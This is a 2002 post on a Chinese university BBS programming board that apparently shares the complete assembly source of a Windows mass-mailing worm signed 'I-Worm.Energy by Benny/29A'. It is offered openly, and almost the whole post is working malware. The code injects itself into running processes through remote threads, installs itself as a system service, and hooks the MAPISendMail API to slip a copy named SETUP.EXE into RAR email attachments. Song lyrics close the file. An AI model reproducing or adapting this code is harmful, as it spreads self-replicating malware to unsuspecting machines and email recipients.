Programming 版 (精华区)
发信人: pzc (不过如此), 信区: Programming
标 题: a worm
发信站: 哈工大紫丁香 (2002年03月13日20:10:29 星期三), 站内信件
.586p
.model flat ;blablabla
extrn GetLastError:PROC ;needed APIz
extrn EnumProcesses:PROC
extrn OpenProcess:PROC
extrn VirtualProtect:PROC
extrn VirtualAllocEx:PROC
extrn VirtualFreeEx:PROC
extrn CloseHandle:PROC
extrn CreateRemoteThread:PROC
extrn WriteProcessMemory:PROC
extrn Sleep:PROC
extrn WaitForSingleObject:PROC
extrn GetModuleHandleA:PROC
extrn GetProcAddress:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn GetModuleFileNameA:PROC
extrn GetFileSize:PROC
extrn ReadFile:PROC
extrn VirtualFree:PROC
extrn VirtualAlloc:PROC
extrn SetFilePointer:PROC
extrn SetFileAttributesA:PROC
extrn OpenMutexA:PROC
extrn ExitThread:PROC
extrn GetSystemDirectoryA:PROC
extrn CopyFileA:PROC
;extrn OpenServiceA:PROC
;extrn DeleteService:PROC ;***debug only!
extrn OpenSCManagerA:PROC
extrn CreateServiceA:PROC
extrn CloseServiceHandle:PROC
extrn StartServiceCtrlDispatcherA:PROC
extrn RegisterServiceCtrlHandlerA:PROC
extrn SetServiceStatus:PROC
include useful.inc ;include filez
include win32api.inc
PROC_COUNT equ 40*4 ;number of processes
.data
db ? ;some data
.code
Start: ;worm code starts here
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
e_name: @pushsz 'EnErGy'
push 0
push 1
call OpenMutexA ;check if mutex is
test eax,eax ;created, if not,
je end_seh ;we are prob. debugged
push eax
call CloseHandle ;close its handle
jmp SVCRegister ;logging as a service
e_svc: push 256
mov esi, offset worm_name
push esi
push 0
call GetModuleFileNameA ;get path+filename of
;the worm
mov edi,offset sys_dir
push edi
push 256
push edi
call GetSystemDirectoryA ;get windowz system dir.
add edi,eax
mov al,'\'
stosb
mov eax,'rene'
stosd
mov eax,'e.yg'
stosd
mov eax,'ex'
stosd ;construct path+filename
pop edi
push 0
push edi
push esi
call CopyFileA ;copy worm to sys. dir.
call SVCCreate ;register as a service
push api_num
pop ecx
call @api_table
dd offset GetModuleHandleA ;adressez of APIz
dd offset GetProcAddress
dd offset VirtualProtect
dd offset CreateFileA
dd offset CloseHandle
dd offset WriteFile
dd offset GetFileSize
dd offset ReadFile
dd offset VirtualFree
dd offset VirtualAlloc
dd offset SetFilePointer
dd offset SetFileAttributesA
api_num = 12
@api_table:
pop ebx
call @api_dest ;addressez of variablez
dd offset _gmha ;that will hold APIz
dd offset _gpa
dd offset _vp
dd offset _cfa
dd offset _ch
dd offset _wf
dd offset _gfs
dd offset _rf
dd offset _vf
dd offset _va
dd offset _sfp
dd offset _sfaa
@api_dest:
pop esi
get_apiz:
dec ecx ;decrement counter
mov eax,[ebx+ecx*4]
mov eax,[eax+2]
mov eax,[eax]
mov edx,[esi+ecx*4]
mov [edx],eax ;store API address
test ecx,ecx
jne get_apiz
worm_loop:
mov ebx,offset tmp
push ebx
push PROC_COUNT
mov esi,offset proc_dump
push esi
call EnumProcesses ;enum all processez
dec eax
jne end_seh
mov ecx,[ebx] ;try this PID
p_check:lodsd
call proc_infect ;try to infect it
add ecx,-3
loop p_check ;try next PID
worm_wait:
push 60000
call Sleep ;wait one minute
jmp worm_loop ;and try again.
;infect processez
proc_infect Proc
pushad
push eax
push 0
push 2 or 8 or 10h or 20h or 400h
call OpenProcess ;get handle to process
xchg eax,ecx
jecxz end_proc_infect
mov ebx,ecx
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virtual_end-Start
push 0
push ebx
call VirtualAllocEx ;allocate there memory
xchg eax,ecx ;for worm
jecxz end_proc_infect2
mov esi,ecx
push 0
push virtual_end-Start
push offset Start
push esi
push ebx
call WriteProcessMemory ;copy there worm body
dec eax
jne end_proc_infect3
lea edx,[esi+offset ThreadEntry-offset Start]
push eax
push eax
push eax
push edx
push eax
push eax
push ebx
call CreateRemoteThread ;create thread there
xchg eax,ecx
jecxz end_proc_infect3
push ecx
push -1
push ecx
call WaitForSingleObject ;wait for its termination
call CloseHandle ;and close its handle
jmp end_proc_infect2 ;and quit
end_proc_infect3:
push MEM_RELEASE
push 0
push esi
push ebx
call VirtualFreeEx ;release memory if failed
end_proc_infect2:
push ebx
call CloseHandle ;close handle to process
end_proc_infect:
popad
ret ;and quit
proc_infect EndP
;remote thread procedure
ThreadEntry Proc
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call gdelta
gdelta: pop ebp ;get delta offset
@pushsz 'MAPI32.dll'
mov eax,12345678h
_gmha = dword ptr $-4
call eax ;get address of MAPI32.dll
xchg eax,ecx
jecxz end_seh ;quit if not loaded
@pushsz 'MAPISendMail'
push ecx
mov eax,12345678h
_gpa = dword ptr $-4
call eax ;get address of
xchg eax,ecx ;MAPISendMail API
jecxz end_seh
mov esi,ecx ;to ESI
lea eax,[ebp + tmp - gdelta]
push eax
push PAGE_READWRITE
push 5
push esi
mov eax,12345678h
_vp = dword ptr $-4
call eax ;release page protection
xchg eax,ecx
jecxz end_seh
call hook_api ;hook the API
end_seh:@SEH_RemoveFrame ;remove SEH frame
popad ;and quit
ret
;proc for API hooking
hook_api:
mov [ebp + old_MAPI_addr - gdelta],esi
push esi
lea edi,[ebp + old_MAPI_api - gdelta]
movsd
movsb ;save first bytez of API
pop edi
mov ebx,edi
lea eax,[ebp + MAPI_hooker - gdelta]
sub ebx,eax
neg ebx
add ebx,-5
mov al,0E9h
stosb
xchg eax,ebx
stosd ;overwrite by JMP <worm_api>
ret
;the API hooker
MAPI_hooker:
push 12345678h
old_MAPI_addr = dword ptr $-4 ;save the address of API
pushad
mov edi,[esp.cPushad] ;get ptr to message
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push edi
mov ebx,[esp.cPushad.28]
mov ecx,[ebx+40] ;number of attachmentz
mov ebx,[ebx+44] ;ptr to file fieldz
f_parse:mov esi,[ebx+12]
lea edi,[ebp + arc_buffer - gdelta]
push edi
@copysz
dec edi
cmp byte ptr [edi-1],'\'
je over_slash
mov al,'\'
stosb
over_slash:
mov esi,[ebx+16]
@copysz
or [esi-5],20202020h ;lower case
cmp [esi-5],'rar.'
pop esi ;create path+filename
jne o_r ;quit if not RAR file
call infect_archive ;try to infect this file
o_r: sub ebx,-24
loop f_parse ;try another file in msg
pop edi
call @m_res
old_MAPI_api db 5 dup (90h)
@m_res: pop esi
movsd
movsb ;remove the API hooker
jmp end_seh ;and quit
;procedure for RAR archive infecting
infect_archive:
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call gd
gd: pop ebp ;get delta offset
lea eax,[ebp + worm_name - gd] ;get worm filename
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ
push eax
call [ebp + _cfa - gd] ;open worm file
inc eax
je end_seh
dec eax
mov [ebp + hFile - gd],eax ;save handle
push 0
push eax
mov eax,12345678h
_gfs = dword ptr $-4
call eax ;get its size
push eax
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push eax
push 0
mov eax,12345678h
_va = dword ptr $-4
call eax ;allocate enough memory
test eax,eax
pop edx
je end_file
xchg eax,ebx
push edx
push 0
lea eax,[ebp + tmp - gd]
push eax
push edx
push ebx
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_rf = dword ptr $-4 ;and copy there worm
call eax
call close_file ;close handle to file
pop edi
pushad
mov esi,ebx
call CRC32 ;calculate CRC32 of
mov [ebp + RARCRC32 - gd],eax ;the worm file
popad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ or GENERIC_WRITE
push esi
mov eax,12345678h
_cfa = dword ptr $-4
call eax ;open the archive
inc eax
je end_file2
dec eax
mov [ebp + hFile - gd],eax ;save its handle
push 2
push 0
push 0
push eax
mov eax,12345678h
_sfp = dword ptr $-4
call eax ;go to EOF
pushad
lea esi,[ebp + RARHeaderCRC+2 - gd]
push end_RAR-RARHeader-2
pop edi
call CRC32 ;calculate CRC32 of
mov [ebp + RARHeaderCRC - gd],ax ;the RAR file header
popad ;and save it
push 0
lea eax,[ebp + tmp - gd]
push eax
push end_RAR-RARHeader
call end_RAR
RARHeader: ;No comment ;)
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SETUP.EXE'
end_RAR:
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_wf = dword ptr $-4
call eax ;write RAR file header
push 0
lea eax,[ebp + tmp - gd]
push eax
push edi
push ebx
push dword ptr [ebp + hFile - gd]
call [ebp + _wf - gd] ;write the worm
end_file2:
push MEM_RELEASE
push 0
push ebx
mov eax,12345678h
_vf = dword ptr $-4
call eax ;release the memory
end_file:
call close_file ;close the archive
push FILE_ATTRIBUTE_READONLY
push esi
mov eax,12345678h
_sfaa = dword ptr $-4
call eax ;set READ-ONLY attribute
jmp end_seh ;and quit
close_file:
push 12345678h ;handle...
hFile = dword ptr $-4
mov eax,12345678h
_ch = dword ptr $-4
call eax ;close file handle
ret
CRC32 Proc
push ecx ;procedure for
push edx ;calculating CRC32s
push ebx ;at run-time
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
SVCHandler:
ret
CRC32 EndP
ThreadEntry EndP
;log on to SCM
SVCRegister Proc
call _dt
dd offset e_name+5
dd offset service_start
dd 0
dd 0
_dt: call StartServiceCtrlDispatcherA ;start service dispatcher
dec eax
jne e_svc ;quit if error (no service
;requestz)
push 0
call ExitThread ;terminate this thread
service_start: ;execution goes here...
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push offset SVCHandler
push offset e_name+5
call RegisterServiceCtrlHandlerA ;register service control
test eax,eax ;handler
je e_svc ;quit if error
push eax
call _ss
ss_: dd 10h or 20h
dd 4
dd 0
dd 0
dd 0
dd 0
dd 0
_ss: push eax
call SetServiceStatus ;set service status
call CloseServiceHandle ;close service handle
jmp e_svc ;and quit
SVCRegister EndP
;create item at SCM
SVCCreate Proc
push 000F0000h or 2
push 0
push 0
call OpenSCManagerA ;get handle to SCM
test eax,eax
je e_scm0
xchg eax,esi
; push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
; push offset e_name+5
; push esi
; call OpenServiceA ;*** debug!
;
; push eax
; push eax
; call DeleteService ;*** debug!
; call CloseServiceHandle ;*** debug!
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push offset sys_dir
push eax
push 2
push 10h
push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
push offset e_name+5
push dword ptr [esp]
push esi
call CreateServiceA ;create service item
test eax,eax ;at SCM
je e_scm1 ;quit if error
push eax
call CloseServiceHandle ;close service handlez
e_scm1: push esi
call CloseServiceHandle ;...
e_scm0: ret ;and quit
SVCCreate EndP
signature db 0,'[I-Worm.Energy] by Benny/29A',0
;signature
proc_dump db PROC_COUNT dup (?) ;buffer for PIDz
worm_name db 256 dup (?) ;buffer for filename
tmp dd ? ;temporary variable
sys_dir db 256 dup (?) ;buffer for system dir.
arc_buffer db 256 dup (?) ;buffer for archive
;filename
virtual_end: ;...end of virus.
ends
end Start ;.
;bonus:
;here are lyrics from "Imagine", one very nice song from John Lennon.
; Imagine there's no heaven,
; It's easy if you try,
; No hell below us,
; Above us only sky,
; Imagine all the people
; living for today...
;
; Imagine there's no countries,
; It isn't hard to do,
; Nothing to kill or die for,
; No religion too,
; Imagine all the people
; living life in peace...
;
; You may say I'm a dreamer,
; but I'm not the only one,
; I hope some day you'll join us,
; And the world will live as one.
;
; Imagine no possesions,
; I wonder if you can,
; No need for greed or hunger,
; A brotherhood of man,
; Imagine all the people
; Sharing all the world...
;
; You may say I'm a dreamer,
; but I'm not the only one,
; I hope some day you'll join us,
; And the world will live as one.
--
※ 来源:·哈工大紫丁香 bbs.hit.edu.cn·[FROM: 202.118.236.144]
Powered by KBS BBS 2.0 (http://dev.kcn.cn)
页面执行时间:207.709毫秒